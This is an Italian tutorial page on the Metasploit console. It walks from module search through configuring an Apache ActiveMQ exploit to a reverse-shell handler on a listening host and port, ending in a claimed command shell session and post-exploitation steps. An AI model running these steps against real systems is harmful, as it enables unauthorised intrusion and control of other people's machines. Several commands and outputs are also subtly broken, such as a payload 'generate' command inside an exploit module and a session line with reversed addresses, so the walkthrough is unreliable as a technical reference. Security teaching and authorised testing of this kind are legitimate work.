Ricerca nel sito web

Come utilizzare l'interfaccia di Metasploit?


In questo tutorial esploreremo le potenti funzionalità dell'interfaccia di Metasploit. Metasploit è un popolare framework di test di penetrazione che consente ai professionisti della sicurezza di identificare e sfruttare le vulnerabilità nei sistemi. Sfruttando la sua vasta gamma di moduli e funzionalità, possiamo ottenere informazioni dettagliate sui potenziali punti deboli della sicurezza e rafforzare le nostre difese. In questo articolo, esamineremo i passaggi dell'utilizzo dell'interfaccia di Metasploit e dimostreremo come può essere uno strumento prezioso nell'arsenale di un professionista della sicurezza.

Installazione e configurazione di Metasploit

Per iniziare la nostra esplorazione di Metasploit, dobbiamo installare e configurare il framework. Segui questi passi:

  • Inizia scaricando Metasploit dal sito ufficiale o tramite il gestore pacchetti del tuo sistema operativo.

  • Installa Metasploit seguendo le istruzioni di installazione fornite per la tua piattaforma specifica.

  • Una volta completata l'installazione, avvia la console Metasploit o apri un terminale e digita "msfconsole" per accedere all'interfaccia.

Installazione e configurazione di Metasploit

$ sudo apt-get install metasploit-framework
$ msfconsole

Risultato  Console Metasploit

 _                                                  
(_) ___  ___ _ __ ___ _ __ ___   __ _ _ __  _ __  
| |/ _ \/ __| '__/ _ \ '_ ` _ \ / _` | '_ \| '_ \
| | (_) \__ \ | |  __/ | | | | | (_| | |_) | |_) |
|_|\___/|___/_|  \___|_| |_| |_|\__,_| .__/| .__/
                                     |_|   |_|
Welcome to Metasploit (version x.x.x)

Dopo aver installato Metasploit, avviamo la console Metasploit (msfconsole) per accedere all'interfaccia. La console fornisce un ambiente a riga di comando in cui possiamo interagire con il framework e i suoi moduli.

Esplorando i moduli di Metasploit

Metasploit offre una vasta raccolta di moduli che comprendono vari exploit, payload, strumenti ausiliari e moduli post-sfruttamento. Esploriamo alcuni di questi moduli 

  • Exploit  I moduli di exploit hanno un target specifico vulnerabilità nei sistemi. Possiamo cercare exploit utilizzando il comando "cerca", specificando parole chiave o nomi di vulnerabilità.

Ricerca di exploit

msf6 > search exploit
msf6 > search name:apache type:exploit

Risultato  Risultati della ricerca

Matching Modules
================

   #  Name                                                Disclosure Date  Rank       Check  Description
   -  ----                                                ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_activemq_upload_jsp   2021-07-02       excellent  Yes    Apache ActiveMQ Upload JSP File Exploit
   1  exploit/multi/http/apache_continuum_rest_exec    2016-10-29       excellent  Yes    Apache Continuum REST API Command Execution
   ...

Il comando "cerca" ci consente di trovare moduli di exploit rilevanti. In questo esempio, cerchiamo gli exploit Apache e otteniamo un elenco di moduli corrispondenti insieme alle relative descrizioni e altri dettagli.

  • Carichi utili  I moduli payload definiscono il azioni da eseguire dopo un exploit riuscito. Possono essere utilizzati per ottenere il controllo remoto, aumentare i privilegi o estrarre informazioni da sistemi compromessi.

Visualizzazione delle opzioni di carico utile

msf6 > use exploit/multi/http/apache_activemq_upload_jsp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show payloads

Risultato  Opzioni di carico utile

Payloads
========

   Name                            Disclosure Date  Rank       Description
   ----                            ---------------  ----       -----------
   cmd/unix/reverse                 Normal           Unix Command, Reverses the connection back to the attacker
   cmd/unix/reverse_perl            Excellent        Unix Command, Perl One-Liner
   ...

Selezionando un modulo di exploit, possiamo visualizzare le opzioni di payload disponibili. Questi payload determinano le azioni eseguite dopo lo sfruttamento riuscito.

Esecuzione di exploit e generazione di payload

Una volta identificato un exploit e selezionato un payload appropriato, possiamo procedere all'esecuzione dell'exploit e generare un payload per ottenere il controllo sul sistema di destinazione.

  • Configurazione dell'exploit  Prima di eseguire un exploit, spesso dobbiamo configurare determinati parametri, come l'host o la porta di destinazione. Utilizza il comando "opzioni" per visualizzare e impostare le opzioni richieste.

Configurazione delle opzioni di exploit

msf6 exploit(multi/http/apache_activemq_upload_jsp) > options
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOSTS 192.168.1.100

Risultato  Impostazione delle opzioni di exploit

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.100    yes       The target address range or CIDR identifier
   ...

Il comando "opzioni" visualizza le opzioni di configurazione disponibili per il modulo exploit selezionato. In questo esempio, impostiamo l'host di destinazione (RHOSTS) su 192.168.1.100.

  • Generazione e distribuzione del carico utile  Una volta configurato l'exploit, possiamo generare il payload e consegnarlo al sistema di destinazione.

Generazione e consegna del carico utile

msf6 exploit(multi/http/apache_activemq_upload_jsp) > generate -t raw -f payload.bin
msf6 exploit(multi/http/apache_activemq_upload_jsp) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse
msf6 exploit(multi/handler) > set LHOST 192.168.1.200
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run

Risultato  Generazione e distribuzione del carico utile

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] Sending payload (payload.bin) to the target
[*] Command shell session X opened (192.168.1.100:4444 -> 192.168.1.200:12345) at 2023-07-15 14:30:00 +0000

Nell'esempio sopra, generiamo un file di payload non elaborato (payload.bin) utilizzando il modulo di exploit selezionato. Impostiamo quindi un gestore per ricevere la connessione inversa dal sistema di destinazione. Dopo aver eseguito l'exploit, viene stabilita una sessione della shell di comando, che ci fornisce il controllo sul sistema compromesso.

Analisi dei risultati

Una volta eseguiti gli exploit e ottenuto l’accesso ai sistemi, è fondamentale analizzare i risultati e approfondire la nostra comprensione dell’ambiente compromesso. Considera i seguenti passaggi 

  • Raccolta di informazioni  Utilizza vari Metasploit moduli e comandi per raccogliere informazioni sul sistema compromesso, come processi in esecuzione, porte aperte e configurazioni di sistema.

  • Sfruttamento in espansione  Metasploit offre numerosi moduli post-sfruttamento che ci consentono di ruotare nella rete, aumentare i privilegi ed eseguire movimenti laterali.

  • Apprendimento e sperimentazione − Metasploit è un framework versatile con una comunità vivace. Esplora la documentazione ufficiale di Metasploit, unisciti ai forum sulla sicurezza e partecipa alle sfide CTF (Capture The Flag) per migliorare ulteriormente le tue conoscenze e competenze.

Conclusione

In questo tutorial abbiamo esplorato gli aspetti fondamentali dell'utilizzo dell'interfaccia di Metasploit. Abbiamo imparato come installare e configurare Metasploit, esplorato la sua vasta libreria di moduli, eseguito exploit e generato payload per ottenere il controllo sui sistemi di destinazione. Sfruttando le capacità di Metasploit, i professionisti della sicurezza possono identificare e affrontare le vulnerabilità, migliorando così il livello di sicurezza delle organizzazioni. Ricorda di praticare sempre un hacking responsabile ed etico, rispettando le leggi e le linee guida che regolano le pratiche di sicurezza informatica.

Dichiarazione di non responsabilità: le informazioni presentate in questo tutorial sono solo a scopo didattico. L'utilizzo di Metasploit e degli strumenti correlati deve rispettare rigorosamente le leggi, i regolamenti e le autorizzazioni applicabili.

Articoli correlati: